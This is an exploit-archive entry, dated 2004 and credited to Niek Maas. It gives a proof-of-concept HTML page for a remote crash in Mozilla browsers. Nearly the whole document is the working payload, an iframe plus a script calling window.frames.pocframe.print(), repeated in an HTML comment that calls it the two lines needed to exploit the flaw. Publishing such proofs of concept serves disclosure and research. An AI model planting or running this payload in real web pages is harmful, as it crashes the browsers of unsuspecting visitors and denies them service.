id: 5922
date: 12/06/2004
title: Mozilla Products Remote Crash Vulnerability
author: Niek Maas
cves: 

===========================================
Mozilla Products Remote Crash Vulnerability
===========================================



<!--PROOF OF CONCEPT
 The vulnerability can be exploited with the following 2 lines of code:
   
  <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
  <script type="text/javascript">window.frames.pocframe.print();</script>
  -->

  <head>
    <title>Mozilla Crash Vulnerability - Proof of Concept</title>
  </head>
  <body>
    <h1>Proof of Concept for Mozilla Crash Vulnerability</h1>
    <h3>Discovered by <a href="mailto:mail[at]niekvandermaas[dot]nl">Niek van der Maas</a>, <a href="http://www.maas-online.nl">MaasOnline</a></h3>
    <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
    <script type="text/javascript">window.frames.pocframe.print();</script>
</body>
</html>



#  0day.today [2023-03-24]  #